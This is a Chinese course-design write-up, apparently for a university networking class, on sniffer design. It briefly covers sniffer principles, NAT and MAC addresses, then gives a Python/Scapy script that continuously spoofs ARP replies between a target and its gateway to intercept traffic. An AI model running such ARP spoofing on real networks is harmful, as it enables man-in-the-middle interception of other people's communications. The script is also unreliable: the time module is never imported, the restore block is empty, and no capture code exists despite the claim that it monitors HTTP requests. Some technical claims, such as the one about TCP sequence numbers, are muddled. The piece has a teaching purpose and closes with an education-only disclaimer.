合工大计算机网络课程设计嗅探器设计

### 合肥工业大学计算机网络课程设计之嗅探器设计

#### 1. 嗅探器概述
嗅探器是一种用于捕获并分析通过网络传输的数据包的工具。其工作原理在于监听特定网卡接收到的所有数据帧，并从中提取有用的信息。对于TCP/IP协议栈而言，由于TCP裸序列号在网络中保持一致性[^1]，因此可以利用这一特性来匹配同一报文的不同副本。

#### 2. 网络环境下的地址转换机制
考虑到实际应用场景可能涉及不同类型的网络连接方式，在公共互联网与私有局域网之间进行通信时，通常会涉及到NAT(Network Address Translation, 网络地址转换)技术的应用。具体来说，当外部主机向内部服务器发起请求时，边界处的路由器将会把源端口以及IP地址映射到目标机器对应的私有地址上[^2]。此过程不影响嗅探器的功能实现，因为后者主要关注于抓取原始流量而非解析高层应用层语义。

#### 3. MAC地址的作用及其重要性
在一个共享介质型LAN(Local Area Network)环境中，所有节点共用同一条物理信道；为了避免冲突发生，每一块网卡都被赋予了一个独一无二的身份标识——即MAC(Media Access Control)地址。它不仅有助于区分各个参与者身份，而且也是构建高效可靠的二层交换结构的基础要素之一[^3]。在开发嗅探程序期间，理解如何识别这些硬件特征至关重要。

#### 4. Python代码示例：简易版ARP欺骗式嗅探脚本
下面给出一段简单的Python代码片段，展示了怎样借助Scapy库创建一个基础版本的ARP Spoofing攻击框架，从而间接达到监控指定范围内所有HTTP GET/POST请求的目的：

from scapy.all import *
import os

def get_mac(ip):
    arp_request = ARP(pdst=ip)
    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
    final_packet = broadcast / arp_request
    answered_list = srp(final_packet, timeout=1, verbose=False)[0]

    return answered_list[0][1].hwsrc


target_ip = "192.168.1.x"
gateway_ip = "192.168.1.y"

try:
    while True:
        send(ARP(op=2, pdst=target_ip, hwdst=get_mac(target_ip), psrc=gateway_ip))
        send(ARP(op=2, pdst=gateway_ip, hwdst=get_mac(gateway_ip), psrc=target_ip))
        time.sleep(2)

except KeyboardInterrupt:
    print("[+] Detected CTRL+C... Restoring network...")
finally:
    # Restore the network to its original state here.

请注意上述例子仅限教育用途，请勿非法入侵他人系统！